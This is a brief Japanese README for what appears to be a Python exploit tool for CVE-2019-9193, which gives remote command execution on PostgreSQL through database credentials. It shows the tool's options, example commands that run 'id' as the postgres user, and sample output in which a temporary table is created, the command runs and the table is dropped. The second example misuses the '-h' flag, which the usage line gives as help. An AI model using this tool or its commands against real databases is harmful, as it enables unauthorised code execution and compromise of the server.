
CVE-2019-9193 の Python エクスプロイトスクリプト。認証済みのコマンドインジェクションを介して、脆弱な PostgreSQL データベースでリモートコード実行を可能にします。
使用法: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
例: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
例2: python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
出力:
[+] Connecting to PostgreSQL Database on 127.0.0.1:5432 [+] PostgreSQL Databaseへの接続を確立しました [+] PostgreSQL versionを確認中 [+] PostgreSQL 9.3 is likely vulnerable [+] テーブル _30e173ba7fa5577a86b9e9ecfea13360 を作成中 [+] コマンドを実行しました
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] テーブル _30e173ba7fa5577a86b9e9ecfea13360 を削除中